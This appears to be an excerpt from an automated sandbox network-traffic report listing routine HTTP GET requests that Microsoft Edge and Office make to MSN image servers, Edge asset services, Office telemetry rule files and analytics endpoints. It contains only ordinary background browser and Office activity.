Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /b2?rn=1731325227261&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1817CCD1391B64C11978D9E5387965A3&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=17De4755cc9bde00e78767e1731325228; XID=17De4755cc9bde00e78767e1731325228
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1msKEt.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA12sf7A.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1msOZa.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=1817CCD1391B64C11978D9E5387965A3&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=ef3f001ede2a4a4ddea4a360bf65106d HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1817CCD1391B64C11978D9E5387965A3; _EDGE_S=F=1&SID=1AA422DAB1436AD93F3837EEB0906B09; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1731325227261&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=cf0083d9bd7d43b991d9ad6081c2b329&activityId=cf0083d9bd7d43b991d9ad6081c2b329&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=5CD1DCDC8EC04B8E8A661A2DA7C3EE4E&MUID=1817CCD1391B64C11978D9E5387965A3 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1817CCD1391B64C11978D9E5387965A3; _EDGE_S=F=1&SID=1AA422DAB1436AD93F3837EEB0906B09; _EDGE_V=1; SM=T
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
